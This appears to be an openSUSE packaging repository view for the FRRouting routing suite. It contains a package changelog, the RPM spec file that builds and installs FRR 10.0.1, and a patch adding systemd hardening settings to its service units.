Fri Oct 15 12:11:50 UTC 2021 - Johannes Segitz <jsegitz@suse.com>
- Drop ProtectClock hardening, can cause issues if other device acceess is needed
-------------------------------------------------------------------
Sat Oct 9 01:58:08 UTC 2021 - Linnaea Lavia <linnaea@lavia.moe>
- Update to version 8.0.1
* refreshed patch:
- 0001-disable-zmq-test.patch
- harden_frr.service.patch
* LDP gained SNMP support
* OSPFv3 gained VRF support
* EVPN Multihoming is now fully supported
* TI-LFA implemented in IS-IS and OSPS
* New Segment Routing daemon
* See: https://frrouting.org/release/8.0/
and https://github.com/FRRouting/frr/releases/tag/frr-8.0.1
-------------------------------------------------------------------
Thu Sep 16 07:12:55 UTC 2021 - Johannes Segitz <jsegitz@suse.com>
- Added hardening to systemd service(s) (bsc#1181400). Added patch(es):
* harden_frr.service.patch
-------------------------------------------------------------------
Fri Apr 23 03:05:06 UTC 2021 - Marius Tomaschewski <mt@suse.com>
- Use skip, not xfail in 0001-disable-zmq-test.patch to disable
zmq test as it is not expected to fail but hangs (bsc#1180217)
-------------------------------------------------------------------
Thu Mar 4 21:20:02 UTC 2021 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.5.1
* Maintenance release
See: https://github.com/FRRouting/frr/blob/stable/7.5/changelog-auto.in
-------------------------------------------------------------------
Fri Jan 8 08:08:08 UTC 2021 - olaf@aepfle.de
- Requires libyang 1.0.184
-------------------------------------------------------------------
Tue Dec 22 10:54:56 UTC 2020 - Rubén Torrero Marijnissen <rtorreromarijnissen@suse.com>
- Disable ZeroMQ tests due to sporadic timeouts during package builds (bsc#1180217)
[+ 0001-disable-zmq-test.patch]
-------------------------------------------------------------------
Wed Nov 4 19:17:10 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.5
* Upstream does not provide a changelog
- Make grpc support optional and don't enable it by default
-------------------------------------------------------------------
Fri Oct 2 12:38:25 UTC 2020 - Marius Tomaschewski <mt@suse.com>
- add build condition disabling mininet build require by default,
needed by the optional topology tests.
- removed one occurrence of vrrpd binary listed twice in file list
-------------------------------------------------------------------
Wed Jul 1 12:21:24 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.4
* Upstream does not provide a changelog
- Drop patch (fixed upstream):
* 0001-build-use-configfile-mode-in-init-script.patch
-------------------------------------------------------------------
Sun May 31 22:40:46 UTC 2020 - Erico Mendonca <erico.mendonca@suse.com>
- 0001-build-use-configfile-mode-in-init-script.patch: Fix CVE-2020-12831 (boo#1171658).
-------------------------------------------------------------------
Wed May 6 16:07:32 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.3.1
Bugfix/maintenance release
* Upstream does not provide a changelog
-------------------------------------------------------------------
Tue Apr 7 21:38:12 UTC 2020 - Marcus Rueckert <mrueckert@suse.de>
- enable verbose make rules
- enable grpc support. new subpackage libfrrgrpc_pb0, new BR:
pkgconfig(grpc)
- enable config rollbacks. new BR: pkgconfig(sqlite3)
- enable realms support
- enable shell access
- make sure we use system openssl
- fix shebang line of the frr-reload.py and
generate_support_bundle.py script so we dont pull python2
- do not delete users and groups.
- add Requires for libyang-extentions
-------------------------------------------------------------------
Sat Feb 15 21:27:22 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.3
* Upstream does not provide a changelog this time
- Remove patch:
* fix_tests.patch (not longer needed)
-------------------------------------------------------------------
Sat Jan 18 20:25:42 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.2.1:
BGPd
* Fix Addpath issue
* Do not apply eBGP policy for iBGP peers
* Show ip and fqdn in json output for show [ip] bgp <route> json
* Fix large route-distinguisher's format
* Fix no bgp listen range ... configuration command
* Autocomplete neighbor for clear bgp
* Reflect the distance in RIB when it is changed for an
arbitrary afi/safi
* Notify "Peer De-configured" after entering 'no neighbor cmd
* Fix per afi/safi addpath peer counting
* Rework BGP dampening to be per AFI/SAFI
* Do not send next-hop as :: in MP_REACH_NLRI if no link-local
exists
* Override peer's TTL only if peer-group is configured with TTL
* Remove error message for unkown afi/safi combination
* Keep the session down if maximum-prefix is reached
OSPFd
* Fix BFD down not tearing down OSPF adjacency for
point-to-point net
BFDd
* Fix multiple VRF handling
* VRF security improvement
PIMd
* Fix rp crash
NHRPd
* Make sure no ip nhrp map <something> works as expected
LDPd
* Add missing sanity check in the parsing of label messages
Zebra
* Use correct state when installing evpn macs
* Capture dplane plugin flags
lib
* Fix interface config when vrf changes
* Fix Interface Infinite Loop Walk (for special interfaces such
as bond)
Others
* Rename man pages (to avoid conflicts with other packages)
* Various other fixes for code cleanup and memory leaks
-------------------------------------------------------------------
Fri Jan 17 21:07:45 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Fix license tag
-------------------------------------------------------------------
Wed Jan 15 20:34:50 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Build with support for pcre, protobuf, rpki and zeromq by default
-------------------------------------------------------------------
Wed Jan 15 14:34:59 UTC 2020 - Ismail Dönmez <idonmez@suse.com>
- Cleanup spec file
-------------------------------------------------------------------
Sun Jan 12 09:40:39 UTC 2020 - Martin Hauke <mardnh@gmx.de>
- Fix build-time dependencies
- Remove superflous comments
-------------------------------------------------------------------
Wed Dec 11 23:18:06 UTC 2019 - Erico Mendonca <erico.mendonca@suse.com>
- fix_tests.patch: correct syntax for Python 3 imports in tests.
- Enabling tests
-------------------------------------------------------------------
Wed Dec 11 02:37:42 UTC 2019 - erico.mendonca@suse.com
- Update to version frr7.2:
* zebra: use correct state when installing evpn macs
* lib: set entry to xpath in if_update_to_new_vrf
* zebra: capture dplane plugin flags
* bgpd: Autocomplete neighbor for clear bgp
* ospfd,eigrpd: don't take address of packed struct member
* bgpd: Prevent crash in bgp_table_range_lookup
* bgpd: Fix memory leak in json output of show commands
* tests: Test if `distance bgp (1-255) (1-255) (1-255)` works
* bgpd: Reflect the distance in RIB when it is changed for an arbitrary afi/safi
* bfdd: fix multiple VRF handling
-------------------------------------------------------------------
Tue Dec 10 12:58:21 UTC 2019 - Erico Mendonca <erico.mendonca@suse.com>
- Updating to version 7.2
- Adding systemd scripts
- Fixing build and permission issues
-------------------------------------------------------------------
Tue Jun 18 08:59:05 UTC 2019 - Martin Hauke <mardnh@gmx.de>
- Update to version 7.0.1
-------------------------------------------------------------------
Sat Feb 2 13:50:16 UTC 2019 - mardnh@gmx.de
- Initial package, version 6.0.2

505
frr.spec Normal file
View File

@ -0,0 +1,505 @@
#
# spec file for package frr
#
# Copyright (c) 2024 SUSE LLC
# Copyright (c) 2019-2021, Martin Hauke <mardnh@gmx.de>
#
# All modifications and additions to the file contributed by third parties
# remain the property of their copyright owners, unless otherwise agreed
# upon. The license for this file, and modifications and additions to the
# file, is the same license as for the pristine package itself (unless the
# license for the pristine package is not an Open Source License, in which
# case the license is the MIT License). An "Open Source License" is a
# license that conforms to the Open Source Definition (Version 1.9)
# published by the Open Source Initiative.
# Please submit bugfixes or comments via https://bugs.opensuse.org/
#
%bcond_with cumulus
%bcond_with datacenter
%bcond_with mininet
%bcond_with grpc
%define frr_user frr
%define frr_group frr
%define frrvty_group frrvty
%define frr_home %{_localstatedir}/lib/%{name}
%define frr_statedir %{_rundir}/%{name}
%define frr_daemondir %{_prefix}/lib/frr
Name: frr
Version: 10.0.1
Release: 0
Summary: The FRRouting Protocol Suite
License: GPL-2.0-or-later AND LGPL-2.1-or-later
Group: Productivity/Networking/System
URL: https://www.frrouting.org
#Git-Clone: https://github.com/FRRouting/frr.git
Source: https://github.com/FRRouting/frr/archive/refs/tags/%{name}-%{version}.tar.gz
Source1: %{name}-tmpfiles.d
Patch0: harden_frr.service.patch
Patch1: 0001-disable-zmq-test.patch
Patch2: 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch
BuildRequires: autoconf
BuildRequires: automake
BuildRequires: bison >= 2.7
BuildRequires: flex
BuildRequires: libtool
BuildRequires: makeinfo
BuildRequires: python3-Sphinx
BuildRequires: python3-devel
BuildRequires: python3-pytest
%if %{with mininet}
BuildRequires: mininet
%endif
BuildRequires: net-snmp-devel
BuildRequires: pam-devel
BuildRequires: pkgconfig
BuildRequires: python-rpm-macros
BuildRequires: readline-devel
BuildRequires: systemd-rpm-macros
%if %{with grpc}
BuildRequires: pkgconfig(grpc)
%endif
BuildRequires: pkgconfig(json-c)
BuildRequires: pkgconfig(libcap)
BuildRequires: pkgconfig(libcares)
BuildRequires: pkgconfig(libelf)
BuildRequires: pkgconfig(libpcre)
BuildRequires: pkgconfig(libprotobuf-c)
%if 0%{?sle_version} == 150500
BuildRequires: libprotoc25_1_0
BuildRequires: libyang1
%endif
BuildRequires: pkgconfig(libsystemd)
BuildRequires: pkgconfig(libyang) >= 2.0.0
BuildRequires: pkgconfig(libzmq) >= 4.0.0
BuildRequires: pkgconfig(rtrlib) >= 0.5.0
BuildRequires: pkgconfig(sqlite3)
Requires(post): %{install_info_prereq}
Requires(pre): %{install_info_prereq}
Requires(pre): shadow
Requires(preun):%{install_info_prereq}
Recommends: logrotate
Conflicts: quagga
Provides: zebra = %{version}
Obsoletes: zebra < %{version}
Provides: group(%{frr_group})
Provides: group(%{frrvty_group})
Provides: user(%{frr_user})
%description
FRR is free software that implements and manages various IPv4 and IPv6 routing protocols.
FRR currently supports the following protocols:
- BGP
- OSPFv2
- OSPFv3
- RIPv1
- RIPv2
- RIPng
- IS-IS
- PIM-SM/MSDP
- LDP
- BFD
- Babel
- PBR
- OpenFabric
- VRRP
- EIGRP (alpha)
- NHRP (alpha)
%package -n libfrrfpm_pb0
Summary: FRRouting fpm protobuf library
Group: System/Libraries
%description -n libfrrfpm_pb0
This library contains forwarding plane manager protobuf definitions
for FRRouting.
%package -n libfrr_pb0
Summary: FRRouting protobuf library
Group: System/Libraries
%description -n libfrr_pb0
This library contains protobuf memory management for FRRouting..
%if %{with grpc}
%package -n libfrrgrpc_pb0
Summary: FRRouting grpc protobuf library
Group: System/Libraries
%description -n libfrrgrpc_pb0
This library contains grpc protobuf definitions for FRRouting.
%endif
%package -n libfrrospfapiclient0
Summary: API for FRRouting's OSPFv2 implementation
Group: System/Libraries
%description -n libfrrospfapiclient0
This library contains part of the OSPFv2 implementation of FRRouting.
%package -n libfrrsnmp0
Summary: FRRouting snmp library
Group: System/Libraries
%description -n libfrrsnmp0
This library contains part of the net-snmp agentx implementation of FRRouting.
%package -n libfrrzmq0
Summary: FRRouting zeromq library
Group: System/Libraries
%description -n libfrrzmq0
This library contains part of the zermomq implementation of FRRouting.
%package -n libfrr0
Summary: FRRouting utility library
Group: System/Libraries
%description -n libfrr0
This library contains various utility functions to FRRouting, such as
data types, buffers and socket handling.
%package -n libfrrcares0
Summary: FRRouting utility library
Group: System/Libraries
%description -n libfrrcares0
This library contains various utility functions to FRRouting, such as
data types, buffers and socket handling.
%package -n libmgmt_be_nb0
Summary: FRRouting utility library
Group: System/Libraries
%description -n libmgmt_be_nb0
This library contains part of the mgmt_be implementation of FRRouting.
%package devel
Summary: Header and object files for frr development
Group: Development/Libraries/C and C++
Requires: libfrr0 = %{version}
Requires: libfrr_pb0 = %{version}
Requires: libfrrcares0 = %{version}
Requires: libfrrfpm_pb0 = %{version}
%if %{with grpc}
Requires: libfrrgrpc_pb0 = %{version}
%endif
Requires: libfrrospfapiclient0 = %{version}
Requires: libfrrsnmp0 = %{version}
Requires: libfrrzmq0 = %{version}
Requires: libmgmt_be_nb0 = %{version}
%description devel
The frr-devel package contains the header and object files necessary for
developing OSPF-API and frr applications.
%prep
%autosetup -n %{name}-%{name}-%{version} -p1
%build
# GCC LTO objects must be "fat" to avoid assembly errors
export CFLAGS="-ffat-lto-objects"
autoreconf -fiv
%configure \
--disable-silent-rules \
--sysconfdir=%{_sysconfdir}\
--localstatedir=%{_rundir} \
--sbindir=%{frr_daemondir} \
--with-moduledir=%{_libdir}/frr/modules \
--disable-static \
--with-vtysh-pager=%{_bindir}/less \
--enable-user=%{frr_user} \
--enable-group=%{frr_group} \
--enable-vty-group=%{frrvty_group} \
--enable-configfile-mask=0640 \
--enable-logfile-mask=0640 \
--enable-doc \
--enable-doc-html \
--enable-babeld \
--enable-bfdd \
--enable-bgpd \
--enable-bgp-vnc \
%if %{with cumulus}
--enable-cumulus \
%endif
%if %{with datacenter}
--enable-datacenter \
%endif
--enable-eigrpd \
--enable-fpm \
--enable-irdp \
--enable-isisd \
--enable-ldpd \
--enable-multipath=256 \
--enable-nhrpd \
--enable-snmp \
--enable-zeromq \
--enable-ospfd \
--enable-ospf6d \
--enable-ospfapi \
--enable-ospfclient \
--with-libpam \
--enable-pbrd \
--enable-pimd \
--enable-pim6d \
--enable-protobuf \
--enable-ripd \
--enable-ripngd \
--enable-rpki \
--enable-rtadv \
--enable-sharpd \
--enable-staticd \
--enable-vtysh \
--enable-watchfrr \
--enable-zebra \
--enable-realms \
--enable-shell-access \
--with-crypto=openssl \
--enable-config-rollbacks \
%if %{with grpc}
--enable-grpc
%endif
make %{?_smp_mflags} MAKEINFO="makeinfo --no-split"
%install
make DESTDIR=%{buildroot} INSTALL="install -p" CP="cp -p" install
perl -p -i -e 's|#!/usr/bin/python|#!/usr/bin/python3|g' %{buildroot}/usr/lib/frr/{frr-reload.py,generate_support_bundle.py}
find %{buildroot} -type f -name "*.la" -delete -print
install -d %{buildroot}%{_sysconfdir}/frr
install -d %{buildroot}/%{_docdir}/%{name}
mv %{buildroot}/%{_datadir}/doc/frr/html %{buildroot}/%{_docdir}/%{name}
# remove stray buildinfo files
find %{buildroot}/%{_docdir}/%{name} -type f -name .buildinfo -delete
# systemd init scripts
install -D -m 0644 tools/frr.service %{buildroot}%{_unitdir}/frr.service
install -D -m 0644 tools%{_sysconfdir}/frr/daemons %{buildroot}%{_sysconfdir}/frr/daemons
# add rpki module to daemon
sed -i -e 's/^\(bgpd_options=\)\(.*\)\(".*\)/\1\2 -M rpki\3/' %{buildroot}%{_sysconfdir}/frr/daemons
%if 0%{?suse_version} > 1500
mkdir -p %{buildroot}%{_pam_vendordir}
install -D -m 0644 redhat/frr.pam %{buildroot}%{_pam_vendordir}/frr
%else
install -D -m 0644 redhat/frr.pam %{buildroot}%{_sysconfdir}/pam.d/frr
%endif
%if 0%{?suse_version} > 1500
install -D -m 0644 redhat/frr.logrotate %{buildroot}%{_distconfdir}/logrotate.d/frr
%else
install -D -m 0644 redhat/frr.logrotate %{buildroot}%{_sysconfdir}/logrotate.d/frr
%endif
install -d -m 0750 %{buildroot}%{rundir}
install -d -m 0750 %{buildroot}%{_localstatedir}/log/frr
install -D -m 0644 %{SOURCE1} %{buildroot}/%{_tmpfilesdir}/%{name}.conf
sed -e "s|@frr_statedir@|%{frr_statedir}|g" -i %{buildroot}/%{_tmpfilesdir}/%{name}.conf
install -d %{buildroot}%{_sbindir}
ln -s %{_sbindir}/service %{buildroot}%{_sbindir}/rcfrr
rm -f %{buildroot}%{frr_daemondir}/ssd
cat > %{buildroot}%{_sysconfdir}/frr/frr.conf << __EOF__
!hostname frr
!password frr
!enable password frr
log file %{_localstatedir}/log/frr/frr.log
__EOF__
cat > %{buildroot}%{_sysconfdir}/frr/vtysh.conf << __EOF__
! vtysh is using PAM authentication allowing root to use it.
__EOF__
%check
make %{?_smp_mflags} -C tests
%pre
# Create frr user/groups
getent group %{frr_group} >/dev/null || groupadd -r %{frr_group}
getent group %{frrvty_group} >/dev/null || groupadd -r %{frrvty_group}
getent passwd %{frr_user} >/dev/null || useradd -r -g %{frr_group} -G %{frrvty_group} -d %{frr_home} -s /sbin/nologin -c "FRRouting suite" %{frr_user}
%service_add_pre %{name}.service
%if 0%{?suse_version} > 1500
# Prepare for migration to /usr/etc; save any old .rpmsave
for i in logrotate.d/frr pam.d/frr ; do
test -f %{_sysconfdir}/${i}.rpmsave && mv -v %{_sysconfdir}/${i}.rpmsave %{_sysconfdir}/${i}.rpmsave.old ||:
done
%endif
%posttrans
%if 0%{?suse_version} > 1500
# Migration to /usr/etc, restore just created .rpmsave
for i in logrotate.d/frr pam.d/frr ; do
test -f %{_sysconfdir}/${i}.rpmsave && mv -v %{_sysconfdir}/${i}.rpmsave %{_sysconfdir}/${i} ||:
done
%endif
%post
%service_add_post %{name}.service
%install_info --info-dir=%{_infodir} %{_infodir}/%{name}.info%{ext_info}
%tmpfiles_create %{_tmpfilesdir}/%{name}.conf || true
%preun
%service_del_preun %{name}.service
%postun
%service_del_postun %{name}.service
%install_info_delete --info-dir=%{_infodir} %{_infodir}/frr.info%{ext_info}
%post -n libfrr_pb0 -p /sbin/ldconfig
%postun -n libfrr_pb0 -p /sbin/ldconfig
%if %{with grpc}
%post -n libfrrgrpc_pb0 -p /sbin/ldconfig
%postun -n libfrrgrpc_pb0 -p /sbin/ldconfig
%endif
%post -n libfrrfpm_pb0 -p /sbin/ldconfig
%postun -n libfrrfpm_pb0 -p /sbin/ldconfig
%post -n libfrrospfapiclient0 -p /sbin/ldconfig
%postun -n libfrrospfapiclient0 -p /sbin/ldconfig
%post -n libfrrsnmp0 -p /sbin/ldconfig
%postun -n libfrrsnmp0 -p /sbin/ldconfig
%post -n libfrrzmq0 -p /sbin/ldconfig
%postun -n libfrrzmq0 -p /sbin/ldconfig
%post -n libfrr0 -p /sbin/ldconfig
%postun -n libfrr0 -p /sbin/ldconfig
%post -n libfrrcares0 -p /sbin/ldconfig
%postun -n libfrrcares0 -p /sbin/ldconfig
%post -n libmgmt_be_nb0 -p /sbin/ldconfig
%postun -n libmgmt_be_nb0 -p /sbin/ldconfig
%files
%license COPYING
%doc README.md
%doc doc/mpls
%dir %attr(750,%{frr_user},%{frr_user}) %{_sysconfdir}/%{name}
%config(noreplace) %attr(640,%{frr_user},%{frr_group}) %{_sysconfdir}/%{name}/[!v]*.conf*
%config(noreplace) %attr(640,%{frr_user},%{frrvty_group}) %{_sysconfdir}/%{name}/vtysh.conf
%config(noreplace) %%attr(640,%{frr_user},%{frr_group}) %{_sysconfdir}/%{name}/daemons
%if 0%{?suse_version} > 1500
%{_pam_vendordir}/frr
%else
%config(noreplace) %{_sysconfdir}/pam.d/frr
%endif
%if 0%{?suse_version} > 1500
%{_distconfdir}/logrotate.d/frr
%else
%config(noreplace) %{_sysconfdir}/logrotate.d/frr
%endif
%{_infodir}/frr.info%{?ext_info}
%{_mandir}/man?/*
%{_docdir}/%{name}/html
%{_unitdir}/%{name}.service
%dir %{_tmpfilesdir}
%{_tmpfilesdir}/%{name}.conf
%dir %attr(-,%{frr_user},%{frr_group}) %{_localstatedir}/log/frr
%dir %attr(-,%{frr_user},%{frr_group}) %ghost %{frr_statedir}
%{_sbindir}/rc%{name}
%dir %{_prefix}/lib/frr
%{_prefix}/lib/frr/fabricd
%{_prefix}/lib/frr/vrrpd
%{_datadir}/yang
%{_bindir}/mtracebis
%{_bindir}/vtysh
%{frr_daemondir}/babeld
%{frr_daemondir}/bfdd
%{frr_daemondir}/bgpd
%{frr_daemondir}/eigrpd
%{frr_daemondir}/frr
%{frr_daemondir}/frr-reload
%{frr_daemondir}/frr-reload.py
%{frr_daemondir}/frr_babeltrace.py
%{frr_daemondir}/frrcommon.sh
%{frr_daemondir}/frrinit.sh
%{frr_daemondir}/isisd
%{frr_daemondir}/ldpd
%{frr_daemondir}/mgmtd
%{frr_daemondir}/nhrpd
%{frr_daemondir}/ospfclient.py
%{frr_daemondir}/ospf6d
%{frr_daemondir}/ospfd
%{frr_daemondir}/pathd
%{frr_daemondir}/pbrd
%{frr_daemondir}/pimd
%{frr_daemondir}/pim6d
%{frr_daemondir}/ripd
%{frr_daemondir}/ripngd
%{frr_daemondir}/sharpd
%{frr_daemondir}/staticd
%{frr_daemondir}/watchfrr
%{frr_daemondir}/watchfrr.sh
%{frr_daemondir}/zebra
%dir %{_libdir}/frr
%dir %{_libdir}/frr/modules
%{_libdir}/frr/modules/zebra_cumulus_mlag.so
%{_libdir}/frr/modules/zebra_fpm.so
%{_libdir}/frr/modules/zebra_irdp.so
%{_libdir}/frr/modules/pathd_pcep.so
%{_libdir}/frr/modules/bgpd_rpki.so
%if %{with grpc}
%{_libdir}/frr/modules/grpc.so
%endif
%{_libdir}/frr/modules/dplane_fpm_nl.so
%{_libdir}/frr/modules/bgpd_bmp.so
%{_prefix}/lib/frr/generate_support_bundle.py
%files -n libfrr_pb0
%{_libdir}/libfrr_pb.so.0*
%files -n libfrrfpm_pb0
%{_libdir}/libfrrfpm_pb.so.0*
%if %{with grpc}
%files -n libfrrgrpc_pb0
%{_libdir}/libfrrgrpc_pb.so.0*
%endif
%files -n libfrrospfapiclient0
%{_libdir}/libfrrospfapiclient.so.0*
%files -n libfrrsnmp0
%{_libdir}/libfrrsnmp.so.0*
%{_libdir}/frr/modules/*_snmp.so
%files -n libfrrzmq0
%{_libdir}/libfrrzmq.so.0*
%files -n libfrr0
%{_libdir}/libfrr.so.0*
%files -n libfrrcares0
%{_libdir}/libfrrcares.so.0*
%files -n libmgmt_be_nb0
%{_libdir}/libmgmt_be_nb.so.0*
%files devel
%dir %{_includedir}/%{name}
%{_includedir}/%{name}/*.h
%dir %{_includedir}/%{name}/ospfd
%{_includedir}/%{name}/ospfd/*.h
%dir %{_includedir}/%{name}/ospfapi
%{_includedir}/%{name}/ospfapi/*.h
%dir %{_includedir}/%{name}/eigrpd
%{_includedir}/%{name}/eigrpd/*.h
%dir %{_includedir}/%{name}/bfdd
%{_includedir}/%{name}/bfdd/*.h
%{_libdir}/lib*.so
%changelog

42
harden_frr.service.patch Normal file
View File

@ -0,0 +1,42 @@
Index: frr-frr-8.1/tools/frr.service.in
===================================================================
--- frr-frr-8.1.orig/tools/frr.service.in
+++ frr-frr-8.1/tools/frr.service.in
@@ -7,6 +7,16 @@ Before=network.target
OnFailure=heartbeat-failed@%n
[Service]
+# added automatically, for details please see
+# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort
+ProtectSystem=full
+ReadWritePaths=/etc/frr
+ProtectHome=true
+ProtectKernelModules=true
+ProtectKernelLogs=true
+ProtectControlGroups=true
+RestrictRealtime=true
+# end of automatic additions
Nice=-5
Type=forking
NotifyAccess=all
Index: frr-frr-8.1/tools/frr@.service.in
===================================================================
--- frr-frr-8.1.orig/tools/frr@.service.in
+++ frr-frr-8.1/tools/frr@.service.in
@@ -7,6 +7,16 @@ Before=network.target
OnFailure=heartbeat-failed@%n
[Service]
+# added automatically, for details please see
+# https://en.opensuse.org/openSUSE:Security_Features#Systemd_hardening_effort
+ProtectSystem=full
+ReadWritePaths=/etc/frr
+ProtectHome=true
+ProtectKernelModules=true
+ProtectKernelLogs=true
+ProtectControlGroups=true
+RestrictRealtime=true
+# end of automatic additions
Nice=-5
Type=forking
NotifyAccess=all